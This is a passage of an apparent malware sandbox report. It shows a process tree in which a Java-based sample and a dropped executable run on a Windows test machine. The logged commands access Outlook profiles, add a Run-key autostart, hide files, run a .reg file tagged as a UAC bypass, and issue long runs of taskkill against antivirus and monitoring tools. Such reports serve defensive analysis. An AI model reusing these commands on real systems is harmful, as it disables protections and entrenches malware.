      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:4264
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:1152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:2952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:3616
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:2500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:2868
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:848
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:3984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:3492
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\explorer.exe
      explorer.exe
      4⤵
      PID:3768
  - - C:\Users\Admin\AppData\Local\Temp\307omiof.exe
      "C:\Users\Admin\AppData\Local\Temp\307omiof.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\307omiof.exe
        
        "C:\Users\Admin\AppData\Local\Temp\307omiof.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:6100
- - C:\Program Files\Java\jre-1.8\bin\javaw.exe
    "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\udroi.jar"
    3⤵
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3652
  - - C:\Windows\system32\icacls.exe
      C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
      4⤵
      Modifies file permissions
      PID:2560
  - - C:\Program Files\Java\jre-1.8\bin\java.exe
      "C:\Program Files\Java\jre-1.8\bin\java.exe" -jar C:\Users\Admin\AppData\Local\Temp\_0.96646936122961796342027709741214622.class
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1752
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive177572356531281323.vbs
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3836
      - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive177572356531281323.vbs
        6⤵
        
        PID:3148
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1984125304874666340.vbs
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1404
      - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1984125304874666340.vbs
        6⤵
        
        PID:3080
    - - C:\Windows\SYSTEM32\xcopy.exe
        
        xcopy "C:\Program Files\Java\jre-1.8" "C:\Users\Admin\AppData\Roaming\Oracle\" /e
        5⤵
        
        PID:388
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1733103004578288790.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1984
    - - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1733103004578288790.vbs
        5⤵
        
        PID:2256
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive911955706343776626.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:936
    - - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive911955706343776626.vbs
        5⤵
        
        PID:1244
  - - C:\Windows\SYSTEM32\xcopy.exe
      xcopy "C:\Program Files\Java\jre-1.8" "C:\Users\Admin\AppData\Roaming\Oracle\" /e
      4⤵
      PID:4852
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      4⤵
      PID:3660
  - - C:\Windows\SYSTEM32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v sVCHXnbVdLZ /t REG_EXPAND_SZ /d "\"C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik\"" /f
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:988
  - - C:\Windows\SYSTEM32\attrib.exe
      attrib +h "C:\Users\Admin\JbWWIoBadTZ\*.*"
      4⤵
      Views/modifies file attributes
      PID:3008
  - - C:\Windows\SYSTEM32\attrib.exe
      attrib +h "C:\Users\Admin\JbWWIoBadTZ"
      4⤵
      Views/modifies file attributes
      PID:4504
  - - C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe
      C:\Users\Admin\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\Admin\JbWWIoBadTZ\lHhuTzdHfZG.ZDwmik
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious use of SetWindowsHookEx
      PID:4372
    - - C:\Users\Admin\AppData\Roaming\Oracle\bin\java.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\Admin\AppData\Local\Temp\_0.904152960078866811491695143606412.class
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:2788
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4035203484800098716.vbs
        6⤵
        
        PID:4176
        
        C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4035203484800098716.vbs
        7⤵
        
        PID:5008
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1999143843184266709.vbs
        6⤵
        
        PID:1300
        
        C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive1999143843184266709.vbs
        7⤵
        
        PID:4132
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe
        6⤵
        
        PID:3660
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive7546217491559085478.vbs
        5⤵
        
        PID:2720
      - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive7546217491559085478.vbs
        6⤵
        
        PID:216
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /C cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4399280327865507649.vbs
        5⤵
        
        PID:4032
      - C:\Windows\system32\cscript.exe
        
        cscript.exe C:\Users\Admin\AppData\Local\Temp\Retrive4399280327865507649.vbs
        6⤵
        
        PID:988
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe
        5⤵
        
        PID:4804
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM UserAccountControlSettings.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c regedit.exe /s C:\Users\Admin\AppData\Local\Temp\gCedOIvFJY6614670385918750497.reg
        5⤵
        
        PID:3772
      - C:\Windows\regedit.exe
        
        regedit.exe /s C:\Users\Admin\AppData\Local\Temp\gCedOIvFJY6614670385918750497.reg
        6⤵
        UAC bypass
        Event Triggered Execution: Image File Execution Options Injection
        Runs .reg file with regedit
        
        PID:4972
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM Taskmgr.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM ProcessHacker.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM procexp.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4480
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MSASCui.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MpUXSrv.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MpCmdRun.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3916
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM NisSrv.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3832
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM ConfigSecurityPolicy.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM procexp.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4380
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM wireshark.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:776
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM tshark.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5320
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM text2pcap.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5688
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM rawshark.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5760
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM mergecap.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6032
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM editcap.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5532
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM dumpcap.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5724
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM capinfos.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5900
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM mbam.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5600
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM mbamscheduler.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5464
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM mbamservice.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5484
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AdAwareService.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6044
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AdAwareTray.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3528
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM WebCompanion.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4864
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AdAwareDesktop.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5876
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM V3Main.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM V3Svc.exe /T /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM V3Up.exe /T /F
        5⤵
        
        PID:6496
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM V3SP.exe /T /F
        5⤵
        
        PID:6564
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM V3Proxy.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:6632
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM V3Medic.exe /T /F
        5⤵
        
        PID:6840
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BgScan.exe /T /F
        5⤵
        
        PID:6988
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BullGuard.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:7064
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BullGuardBhvScanner.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:7140
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BullGuarScanner.exe /T /F
        5⤵
        
        PID:6528
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM LittleHook.exe /T /F
        5⤵
        
        PID:5776
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BullGuardUpdate.exe /T /F
        5⤵
        
        PID:6680
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM clamscan.exe /T /F
        5⤵
        
        PID:6752
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM ClamTray.exe /T /F
        5⤵
        
        PID:2268
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM ClamWin.exe /T /F
        5⤵
        
        PID:6408
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM cis.exe /T /F
        5⤵
        
        PID:6892
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM CisTray.exe /T /F
        5⤵
        
        PID:5804
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM cmdagent.exe /T /F
        5⤵
        
        PID:6140
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM cavwp.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:7004
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM dragon_updater.exe /T /F
        5⤵
        
        PID:7084
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MWAGENT.EXE /T /F
        5⤵
        
        PID:6988
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM MWASER.EXE /T /F
        5⤵
        
        PID:5988
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM CONSCTLX.EXE /T /F
        5⤵
        
        PID:5896
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM avpmapp.exe /T /F
        5⤵
        
        PID:6488
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM econceal.exe /T /F
        5⤵
        
        PID:6624
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM escanmon.exe /T /F
        5⤵
        
        PID:6780
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM escanpro.exe /T /F
        5⤵
        
        PID:6836
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM TRAYSSER.EXE /T /F
        5⤵
        
        PID:6916
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM TRAYICOS.EXE /T /F
        5⤵
        
        PID:5332
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM econser.exe /T /F
        5⤵
        
        PID:5840
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM VIEWTCP.EXE /T /F
        5⤵
        
        PID:7008
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FSHDLL64.exe /T /F
        5⤵
        
        PID:7040
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM fsgk32.exe /T /F
        5⤵
        
        PID:7080
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM fshoster32.exe /T /F
        5⤵
        
        PID:7144
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FSMA32.EXE /T /F
        5⤵
        
        PID:6208
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM fsorsp.exe /T /F
        5⤵
        
        PID:1172
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM fssm32.exe /T /F
        5⤵
        
        PID:6488
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FSM32.EXE /T /F
        5⤵
        
        PID:6660
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM trigger.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:6760
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FProtTray.exe /T /F
        5⤵
        
        PID:2652
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FPWin.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:6780
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM FPAVServer.exe /T /F
        5⤵
        
        PID:6792
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AVK.exe /T /F
        5⤵
        
        PID:6892
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM GdBgInx64.exe /T /F
        5⤵
        
        PID:6632
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AVKProxy.exe /T /F
        5⤵
        
        PID:4536
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM GDScan.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:7024
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AVKWCtlx64.exe /T /F
        5⤵
        
        PID:6428
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AVKService.exe /T /F
        5⤵
        
        PID:7132
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AVKTray.exe /T /F
        5⤵
        
        PID:4568
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM GDKBFltExe32.exe /T /F
        5⤵
        
        PID:6268
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM GDSC.exe /T /F
        5⤵
        
        PID:4916
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM virusutilities.exe /T /F
        5⤵
        
        PID:6528
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM guardxservice.exe /T /F
        5⤵
        
        PID:6656
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM guardxkickoff_x64.exe /T /F
        5⤵
        
        PID:6732
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM iptray.exe /T /F
        5⤵
        
        PID:6196
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM freshclam.exe /T /F
        5⤵
        
        PID:6904
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM freshclamwrap.exe /T /F
        5⤵
        
        PID:6792
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7RTScan.exe /T /F
        5⤵
        
        PID:6772
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7FWSrvc.exe /T /F
        5⤵
        
        PID:3520
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7PSSrvc.exe /T /F
        5⤵
        
        PID:1324
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7EmlPxy.EXE /T /F
        5⤵
        Kills process with taskkill
        
        PID:6980
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7TSecurity.exe /T /F
        5⤵
        
        PID:5148
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7AVScan.exe /T /F
        5⤵
        
        PID:3436
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7CrvSvc.exe /T /F
        5⤵
        
        PID:7148
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7SysMon.Exe /T /F
        5⤵
        
        PID:6500
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7TSMain.exe /T /F
        5⤵
        
        PID:4940
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7TSMngr.exe /T /F
        5⤵
        
        PID:4576
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nanosvc.exe /T /F
        5⤵
        
        PID:6688
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nanoav.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:6748
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nnf.exe /T /F
        5⤵
        
        PID:6736
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nvcsvc.exe /T /F
        5⤵
        
        PID:6240
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nbrowser.exe /T /F
        5⤵
        
        PID:6796
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nseupdatesvc.exe /T /F
        5⤵
        
        PID:6624
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nfservice.exe /T /F
        5⤵
        
        PID:1672
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nwscmon.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:2840
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM njeeves2.exe /T /F
        5⤵
        
        PID:2796
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nvcod.exe /T /F
        5⤵
        
        PID:3296
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nvoy.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:6328
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM zlhh.exe /T /F
        5⤵
        
        PID:7040
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM Zlh.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:7124
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM nprosec.exe /T /F
        5⤵
        
        PID:1184
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM Zanda.exe /T /F
        5⤵
        
        PID:6364
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM NS.exe /T /F
        5⤵
        
        PID:6948
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM acs.exe /T /F
        5⤵
        
        PID:4012
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM op_mon.exe /T /F
        5⤵
        
        PID:3976
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM PSANHost.exe /T /F
        5⤵
        
        PID:5588
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM PSUAMain.exe /T /F
        5⤵
        
        PID:6248
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM PSUAService.exe /T /F
        5⤵
        
        PID:5808
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM AgentSvc.exe /T /F
        5⤵
        
        PID:6296
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM BDSSVC.EXE /T /F
        5⤵
        
        PID:5356
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM EMLPROXY.EXE /T /F
        5⤵
        Kills process with taskkill
        
        PID:2232
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM OPSSVC.EXE /T /F
        5⤵
        
        PID:4480
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM ONLINENT.EXE /T /F
        5⤵
        
        PID:3672
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM QUHLPSVC.EXE /T /F
        5⤵
        
        PID:6960
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SAPISSVC.EXE /T /F
        5⤵
        
        PID:3172
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SCANNER.EXE /T /F
        5⤵
        
        PID:5508
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SCANWSCS.EXE /T /F
        5⤵
        
        PID:2324
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM scproxysrv.exe /T /F
        5⤵
        
        PID:396
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM ScSecSvc.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:5100
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SUPERAntiSpyware.exe /T /F
        5⤵
        
        PID:6988
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SASCore64.exe /T /F
        5⤵
        
        PID:1496
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SSUpdate64.exe /T /F
        5⤵
        
        PID:6500
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SUPERDelete.exe /T /F
        5⤵
        
        PID:5896
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SASTask.exe /T /F
        5⤵
        
        PID:1172
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7RTScan.exe /T /F
        5⤵
        
        PID:5776
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7FWSrvc.exe /T /F
        5⤵
        
        PID:5004
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7PSSrvc.exe /T /F
        5⤵
        
        PID:5808
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7EmlPxy.EXE /T /F
        5⤵
        
        PID:5924
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7TSecurity.exe /T /F
        5⤵
        
        PID:6868
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7AVScan.exe /T /F
        5⤵
        
        PID:2144
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7CrvSvc.exe /T /F
        5⤵
        
        PID:2232
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7SysMon.Exe /T /F
        5⤵
        
        PID:6096
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7TSMain.exe /T /F
        5⤵
        
        PID:3672
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM K7TSMngr.exe /T /F
        5⤵
        
        PID:6720
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM uiWinMgr.exe /T /F
        5⤵
        
        PID:7156
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM uiWatchDog.exe /T /F
        5⤵
        
        PID:6840
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM uiSeAgnt.exe /T /F
        5⤵
        
        PID:4636
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM PtWatchDog.exe /T /F
        5⤵
        
        PID:5848
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM PtSvcHost.exe /T /F
        5⤵
        
        PID:4568
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM PtSessionAgent.exe /T /F
        5⤵
        
        PID:5024
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM coreFrameworkHost.exe /T /F
        5⤵
        
        PID:7140
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM coreServiceShell.exe /T /F
        5⤵
        
        PID:6712
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM uiUpdateTray.exe /T /F
        5⤵
        
        PID:6492
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM VIPREUI.exe /T /F
        5⤵
        
        PID:6148
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /IM SBAMSvc.exe /T /F
        5⤵
        
        PID:5488
    - - C:\Windows\SYSTEM32\taskkill.exe
        
